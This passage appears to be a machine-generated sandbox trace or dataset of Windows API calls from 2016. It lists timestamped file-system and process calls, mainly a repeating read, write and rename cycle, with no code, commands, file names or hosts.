"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,164", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,174", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,174", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,174", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,174", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,174", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,174", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,174", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,174", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,174", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,174", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,184", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,184", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,184", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,184", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,184", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,184", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,184", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,184", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,194", "api": 
"NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,194", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,194", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,194", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,194", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,194", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,194", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,194", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,194", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,194", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,194", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,204", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,204", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,204", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,204", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,204", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,204", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,204", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,204", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,204", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,204", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,214", "api": "NtFreeVirtualMemory"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:50,214", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,214", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,214", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,214", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,214", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,214", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,214", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,214", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,214", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,214", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,224", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,224", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,224", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,224", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,224", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,224", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,224", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,224", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,234", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,234", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,234", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,244", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,244", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,244", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,244", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,244", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,244", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,244", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:50,244", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,244", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,244", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,244", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,244", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,244", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,254", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,254", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,254", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,254", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,254", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,254", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,254", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,254", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,254", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,254", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,264", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,264", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,264", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,264", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,264", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,264", 
"api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,264", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,264", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,264", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,264", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,264", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,274", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,274", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,274", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,274", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,274", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,274", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,274", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,274", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,274", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,274", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,274", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,274", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,284", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,284", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,284", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,284", "api": 
"NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,284", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,284", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,284", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,284", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,284", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,284", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,284", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,294", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,294", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,294", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,294", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,294", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,294", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,294", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,294", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,294", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,294", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,294", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,304", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,304", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,304", "api": "NtReadFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:50,304", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,304", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,304", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,304", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,304", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,304", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,314", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,335", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,335", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,335", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,335", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,335", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,335", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,335", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,335", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,335", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,345", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,345", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,345", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,345", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,345", "api": "NtWriteFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:50,345", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,345", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,345", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,345", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,345", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,355", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,355", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,355", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,355", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,355", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,355", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,355", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,355", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,365", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,365", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,365", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,365", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,365", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,365", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,365", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,365", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:50,365", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,365", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,365", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,365", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,375", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,375", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,375", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,375", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,375", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,375", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,375", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,375", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,375", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,375", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,385", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,385", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,385", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,385", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,385", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,385", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,385", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,385", 
"api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,385", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,395", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,395", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,395", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,395", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,395", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,395", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,395", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,395", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,395", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,405", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,405", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,405", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,405", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,405", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,405", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,405", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,405", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,415", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,415", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,415", "api": 
"NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,415", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,415", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,415", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,415", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,415", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,415", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,415", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,415", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,425", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,425", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,425", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,425", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,425", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,425", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,425", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,425", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,425", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,425", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,425", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,435", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,435", "api": "MoveFileWithProgressW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:50,435", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,435", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,435", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,435", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,435", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,435", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,435", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,435", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,445", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,445", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,445", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,445", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,445", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,445", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,445", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,445", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,455", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,455", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,455", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,455", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,455", "api": "NtSetInformationFile"}, {"category": "process", 
"timestamp": "2016-02-16 17:41:50,455", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,455", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,455", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,455", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,455", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,465", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,465", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,465", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,465", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,465", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,465", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,465", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,465", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,465", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,465", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,465", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,475", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,475", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,475", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,475", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,475", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:50,475", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,475", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,475", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,475", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,475", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,485", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,485", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,485", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,485", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,485", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,485", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,485", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,485", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,485", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,505", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,505", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,505", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,505", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,515", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,515", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,515", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 